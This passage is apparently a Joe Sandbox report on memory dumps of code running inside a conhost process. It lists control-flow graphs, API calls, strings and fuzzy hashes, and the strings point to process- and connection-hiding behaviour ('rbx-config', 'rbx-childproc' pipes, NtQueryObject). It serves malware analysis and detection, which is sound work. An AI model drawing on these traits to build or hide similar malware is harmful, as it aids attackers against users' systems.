                                                  control_flow_graph 197 1d547832ff0-1d547833069 199 1d54783306f-1d547833075 197->199 200 1d547833384-1d5478333a7 197->200 199->200 201 1d54783307b-1d54783307e 199->201 201->200 202 1d547833084-1d547833087 201->202 202->200 203 1d54783308d-1d54783309d GetModuleHandleA 202->203 204 1d54783309f-1d5478330af GetProcAddress 203->204 205 1d5478330b1 203->205 206 1d5478330b4-1d5478330d2 204->206 205->206 206->200 208 1d5478330d8-1d5478330f7 StrCmpNIW 206->208 208->200 209 1d5478330fd-1d547833101 208->209 209->200 210 1d547833107-1d547833111 209->210 210->200 211 1d547833117-1d54783311e 210->211 211->200 212 1d547833124-1d547833137 211->212 213 1d547833147 212->213 214 1d547833139-1d547833145 212->214 215 1d54783314a-1d54783314e 213->215 214->215 216 1d547833150-1d54783315c 215->216 217 1d54783315e 215->217 218 1d547833161-1d54783316b 216->218 217->218 219 1d547833251-1d547833255 218->219 220 1d547833171-1d547833174 218->220 221 1d547833376-1d54783337e 219->221 222 1d54783325b-1d54783325e 219->222 223 1d547833186-1d547833190 220->223 224 1d547833176-1d547833183 call 1d547831a30 220->224 221->200 221->212 227 1d547833260-1d54783326c call 1d547831a30 222->227 228 1d54783326f-1d547833279 222->228 225 1d5478331c4-1d5478331ce 223->225 226 1d547833192-1d54783319f 223->226 224->223 231 1d5478331d0-1d5478331dd 225->231 232 1d5478331fe-1d547833201 225->232 226->225 230 1d5478331a1-1d5478331ae 226->230 227->228 234 1d54783327b-1d547833288 228->234 235 1d5478332a9-1d5478332ac 228->235 239 1d5478331b1-1d5478331b7 230->239 231->232 240 1d5478331df-1d5478331ec 231->240 242 1d54783320f-1d54783321c lstrlenW 232->242 243 1d547833203-1d54783320d call 1d547831cc4 232->243 234->235 244 1d54783328a-1d547833297 234->244 237 1d5478332b9-1d5478332c6 lstrlenW 235->237 238 1d5478332ae-1d5478332b7 call 1d547831cc4 235->238 248 1d5478332c8-1d5478332d7 call 1d547831cfc 237->248 249 1d5478332d9-1d5478332e3 call 1d547833f88 237->249 238->237 262 1d5478332ee-1d5478332f9 238->262 246 1d547833247-1d54783324c 239->246 247 1d5478331bd-1d5478331c2 239->247 250 1d5478331ef-1d5478331f5 240->250 253 1d54783322f-1d547833241 call 1d547833f88 242->253 254 1d54783321e-1d54783322d call 1d547831cfc 242->254 243->242 243->246 252 1d54783329a-1d5478332a0 244->252 257 1d5478332e6-1d5478332e8 246->257 247->225 247->239 248->249 248->262 249->257 250->246 260 1d5478331f7-1d5478331fc 250->260 252->262 263 1d5478332a2-1d5478332a7 252->263 253->246 253->257 254->246 254->253 257->221 257->262 260->232 260->250 269 1d5478332fb-1d5478332ff 262->269 270 1d547833370-1d547833374 262->270 263->235 263->252 271 1d547833307-1d547833321 call 1d547843a40 269->271 272 1d547833301-1d547833305 269->272 270->221 273 1d547833324-1d547833327 271->273 272->271 272->273 276 1d54783334a-1d54783334d 273->276 277 1d547833329-1d547833347 call 1d547843a40 273->277 276->270 279 1d54783334f-1d54783336d call 1d547843a40 276->279 277->276 279->270
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction ID: 195a22ade48b9ab28047751ee69f8a0c2e9f0b61ddf168c79a6427aaa56f36f5
                                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction Fuzzy Hash: C2B17E32210E9082EFA59F2AD5007E9A3A6F744B96F449017EE0957B94FF3ACDC4C781
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction ID: 99442249b4335ca0db240c8a78c94b6b938b7755e7de67310ba8109cfc850f44
                                                  • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction Fuzzy Hash: CE316B72205F848AEBA08F64E8403EE7365F784749F44402BDA4E57B99FF78C688C751
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction ID: 1033b3bb3d8f12235c40b3c4963881548f00943e6af065475df2d6d61bb74cba
                                                  • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction Fuzzy Hash: 36418E36214F8086EBA0CF28E8403DE73A5F789759F500216EA8D47B98EF78C199CB41
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID:
                                                  • API String ID: 1164774033-0
                                                  • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction ID: 37b8320e96d14d2f41be2a9b39f73ff7188af9aaf6b1bbcc0a4b080f052b4d07
                                                  • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction Fuzzy Hash: 99A14732714E8049FFA09B79E4443ED6BA3E741795F044113DE98A7B99EB39C0C2C392

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 2135414181-3414887735
                                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction ID: 9fc9fa5a92ffbe061b244d59f2b5938825ab1fceffdc9d14ccecdda7bf962b14
                                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction Fuzzy Hash: 1F712936710E5086EFA09F65E8946DD23A6FB88F8AF401112DE4D57B28FF79C484D781

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction ID: aa5e6b0c0b35e2da44ce3aaeef95a74741fd7f5a192b3896437aca0b61f14667
                                                  • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction Fuzzy Hash: 09515D32610F8496EBA4CF66E44839A77A2F788F99F444126DE4917718FF7DC085C781

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                  • API String ID: 740688525-1880043860
                                                  • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction ID: 15219f04a8bcf768e620ff0319bb8e6dd68cfefcc5bc06107b335e4afb4f8f99
                                                  • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction Fuzzy Hash: 7E519E32701F0451EF959B6AA8143E92292FB48BB2F5807269E3D473D1FF79D48586C2

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Running Time
                                                  • API String ID: 1943346504-1805530042
                                                  • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction ID: d0dc8ff404b7b1a1b81bb5fd52926c8eea3b102407e489cdc25860051f55d887
                                                  • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction Fuzzy Hash: 5F31F232A00F4097FFA1CF16E8043D9A3A2F798BD6F444226DE4953A24FF78C4968381

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                  • API String ID: 1943346504-3507739905
                                                  • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction ID: 19c15f9b9ce77521138edae3db8b5ff6336b0636e20581432a9e263082ced90d
                                                  • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction Fuzzy Hash: 70314B32610F418AEF90DF26A88479967A2F784F96F444127DE4A93B24FF79C885C781
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000003.2188818508.000001D547800000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D547800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_3_1d547800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                  • Instruction ID: 664f7e5bee0a010f6580fc56d633e9354375849dc810d4d9a42c9b034f3b747f
                                                  • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                  • Instruction Fuzzy Hash: 59D19E32600B8486EFA0DF65D4843ED7BA6F785789F120116EF8957B9AEB34C0D0C782

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 313 1d54783a22c-1d54783a294 call 1d54783b144 316 1d54783a6f5-1d54783a6fb call 1d54783c388 313->316 317 1d54783a29a-1d54783a29d 313->317 317->316 319 1d54783a2a3-1d54783a2a9 317->319 321 1d54783a378-1d54783a38a 319->321 322 1d54783a2af-1d54783a2b3 319->322 323 1d54783a645-1d54783a649 321->323 324 1d54783a390-1d54783a394 321->324 322->321 325 1d54783a2b9-1d54783a2c4 322->325 327 1d54783a64b-1d54783a652 323->327 328 1d54783a682-1d54783a68c call 1d547839324 323->328 324->323 329 1d54783a39a-1d54783a3a5 324->329 325->321 326 1d54783a2ca-1d54783a2cf 325->326 326->321 331 1d54783a2d5-1d54783a2df call 1d547839324 326->331 327->316 332 1d54783a658-1d54783a67d call 1d54783a6fc 327->332 328->316 341 1d54783a68e-1d54783a6ad call 1d547838070 328->341 329->323 330 1d54783a3ab-1d54783a3af 329->330 334 1d54783a575-1d54783a581 330->334 335 1d54783a3b5-1d54783a3f0 call 1d547839704 330->335 331->341 344 1d54783a2e5-1d54783a310 call 1d547839324 * 2 call 1d547839a0c 331->344 332->328 334->328 342 1d54783a587-1d54783a58b 334->342 335->334 350 1d54783a3f6-1d54783a3ff 335->350 346 1d54783a59b-1d54783a5a3 342->346 347 1d54783a58d-1d54783a599 call 1d5478399cc 342->347 380 1d54783a330-1d54783a33a call 1d547839324 344->380 381 1d54783a312-1d54783a316 344->381 346->328 349 1d54783a5a9-1d54783a5b6 call 1d5478395a4 346->349 347->346 357 1d54783a5bc-1d54783a5c4 347->357 349->328 349->357 355 1d54783a403-1d54783a435 350->355 359 1d54783a568-1d54783a56f 355->359 360 1d54783a43b-1d54783a447 355->360 362 1d54783a6d8-1d54783a6f4 call 1d547839324 * 2 call 1d54783c2f4 357->362 363 1d54783a5ca-1d54783a5ce 357->363 359->334 359->355 360->359 364 1d54783a44d-1d54783a46c 360->364 362->316 366 1d54783a5d0-1d54783a5df call 1d5478399cc 363->366 367 1d54783a5e1 363->367 368 1d54783a558-1d54783a55d 364->368 369 1d54783a472-1d54783a4af call 1d5478399e0 * 2 364->369 376 1d54783a5e3-1d54783a5ed call 1d54783b1dc 366->376 367->376 368->359 395 1d54783a4e2-1d54783a4e5 369->395 376->328 392 1d54783a5f3-1d54783a643 call 1d547839634 call 1d547839838 376->392 380->321 394 1d54783a33c-1d54783a35c call 1d547839324 * 2 call 1d54783b1dc 380->394 381->380 385 1d54783a318-1d54783a323 381->385 385->380 391 1d54783a325-1d54783a32a 385->391 391->316 391->380 392->328 418 1d54783a35e-1d54783a368 call 1d54783b2cc 394->418 419 1d54783a373 394->419 399 1d54783a4e7-1d54783a4ee 395->399 400 1d54783a4b1-1d54783a4d7 call 1d5478399e0 call 1d54783a96c 395->400 403 1d54783a4f0-1d54783a4f4 399->403 404 1d54783a55f 399->404 414 1d54783a4f9-1d54783a556 call 1d54783a158 400->414 415 1d54783a4d9-1d54783a4dc 400->415 403->369 408 1d54783a564 404->408 408->359 414->408 415->395 423 1d54783a36e-1d54783a6d1 call 1d547838f84 call 1d54783ad28 call 1d547839178 418->423 424 1d54783a6d2-1d54783a6d7 call 1d54783c2f4 418->424 419->321 423->424 424->362
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction ID: 4286ff741eaf63d7d2f9202996cad42a7547a22ed3c31d166793439a5c3b4931
                                                  • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction Fuzzy Hash: A8D19B72604B808AEFA0DF69D4403DD77A6F75578AF100117EE8957B9AEB3AC4D0C782

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 434 1d54783104c-1d5478310b9 RegQueryInfoKeyW 435 1d5478311b5-1d5478311d0 434->435 436 1d5478310bf-1d5478310c9 434->436 436->435 437 1d5478310cf-1d54783111f RegEnumValueW 436->437 438 1d5478311a5-1d5478311af 437->438 439 1d547831125-1d54783112a 437->439 438->435 438->437 439->438 440 1d54783112c-1d547831135 439->440 441 1d547831147-1d54783114c 440->441 442 1d547831137 440->442 444 1d547831199-1d5478311a3 441->444 445 1d54783114e-1d547831193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 441->445 443 1d54783113b-1d54783113f 442->443 443->438 446 1d547831141-1d547831145 443->446 444->438 445->444 446->441 446->443
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                  • String ID: d
                                                  • API String ID: 3743429067-2564639436
                                                  • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction ID: 712e6ab0d1c4180a95dc47fb3f701f661ad132f1976d80ee81743b409c384cff
                                                  • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                  • Instruction Fuzzy Hash: 40415E32614F84D6EBA0CF25E44439E77B2F388B99F448116DA8907758EF39C485CB81

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000002.2328179259.000001D547831000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D547830000, based on PE: true
                                                  • Associated: 00000028.00000002.2328141848.000001D547830000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328225367.000001D547845000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328270655.000001D547850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328310174.000001D547852000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000028.00000002.2328349108.000001D547859000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_2_1d547830000_conhost.jbxd
                                                  Similarity
                                                  • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                  • String ID: \\.\pipe\$rbx-childproc
                                                  • API String ID: 166002920-1828357524
                                                  • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction ID: c9ba1e84c49741eab072dbcc24dbfc1dcfdfb5ebd9dc0a7aa3a493db2311e553
                                                  • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                  • Instruction Fuzzy Hash: 2D115E36614B4083EB50CF25F41839A7762F389BD6F940316EA5942BA8FF7CC188CB81
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000028.00000003.2188818508.000001D547800000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D547800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_40_3_1d547800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 190073905-0
                                                  • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction ID: e6c847801b9918108a44f0f131d5db9c056801e0520ac2bd90a26862ebd7941a
                                                  • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                  • Instruction Fuzzy Hash: 4681DF71601EC586FFD4AB2598413D93A9BEB86782F464127AA09473D6FB38C8C1C7C3

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 452 1d547837c50-1d547837c56 453 1d547837c58-1d547837c5b 452->453 454 1d547837c91-1d547837c9b 452->454 455 1d547837c85-1d547837cc4 call 1d5478382f0 453->455 456 1d547837c5d-1d547837c60 453->456 457 1d547837db8-1d547837dcd 454->457 475 1d547837cca-1d547837cdf call 1d547838184 455->475 476 1d547837d92 455->476 458 1d547837c78 __scrt_dllmain_crt_thread_attach 456->458 459 1d547837c62-1d547837c65 456->459 460 1d547837ddc-1d547837df6 call 1d547838184 457->460 461 1d547837dcf 457->461 467 1d547837c7d-1d547837c84 458->467 463 1d547837c67-1d547837c70 459->463 464 1d547837c71-1d547837c76 call 1d547838234 459->464 473 1d547837df8-1d547837e29 call 1d5478382ac call 1d54783814c call 1d547838634 call 1d547838450 call 1d547838474 call 1d5478382dc 460->473 474 1d547837e2b-1d547837e5c call 1d5478384b0 460->474 465 1d547837dd1-1d547837ddb 461->465 464->467 473->465 486 1d547837e5e-1d547837e64 474->486 487 1d547837e6d-1d547837e73 474->487 484 1d547837ce5-1d547837cf6 call 1d5478381f4 475->484 485 1d547837daa-1d547837db7 call 1d5478384b0 475->485 479 1d547837d94-1d547837da9 476->479 502 1d547837cf8-1d547837d1c call 1d5478385f8 call 1d54783813c call 1d547838168 call 1d54783b428 484->502 503 1d547837d47-1d547837d51 call 1d547838450 484->503 485->457 486->487 491 1d547837e66-1d547837e68 486->491 492 1d547837eb5-1d547837ecb call 1d547833a1c 487->492 493 1d547837e75-1d547837e7f 487->493 498 1d547837f52-1d547837f5f 491->498 511 1d547837ecd-1d547837ecf 492->511 512 1d547837f03-1d547837f05 492->512 499 1d547837e86-1d547837e8c 493->499 500 1d547837e81-1d547837e84 493->500 505 1d547837e8e-1d547837e94 499->505 500->505 502->503 554 1d547837d1e-1d547837d25 __scrt_dllmain_after_initialize_c 502->554 503->476 526 1d547837d53-1d547837d5f call 1d5478384a0 503->526 507 1d547837f48-1d547837f50 505->507 508 1d547837e9a-1d547837eaf call 1d547837c50 505->508 507->498 508->492 508->507 511->512 521 1d547837ed1-1d547837ef3 call 1d547833a1c call 1d547837db8 511->521 515 1d547837f07-1d547837f0a 512->515 516 